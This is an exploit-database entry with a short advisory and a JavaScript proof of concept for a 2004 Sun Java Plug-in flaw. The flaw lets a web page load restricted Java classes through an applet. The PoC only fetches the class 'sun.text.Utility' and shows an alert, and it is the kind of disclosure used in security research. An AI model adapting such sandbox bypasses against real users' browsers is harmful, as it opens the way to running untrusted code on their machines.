Lucene search

K
exploitdbJouko PynnonenEDB-ID:24763
HistoryNov 22, 2004 - 12:00 a.m.

Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass

2004-11-2200:00:00
Jouko Pynnonen
www.exploit-db.com
15

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/11726/info

A vulnerability is reported to exist in the access controls of the Java to JavaScript data exchange within web browsers that employ the Sun Java Plug-in. Reports indicate that it is possible for a malicious website that contains JavaScript code to exploit this vulnerability to load a dangerous Java class and to pass this class to an invoked applet.

[script language=javascript]
var c=document.applets[0].getClass().forName('sun.text.Utility');
alert('got Class object: '+c)
[/script]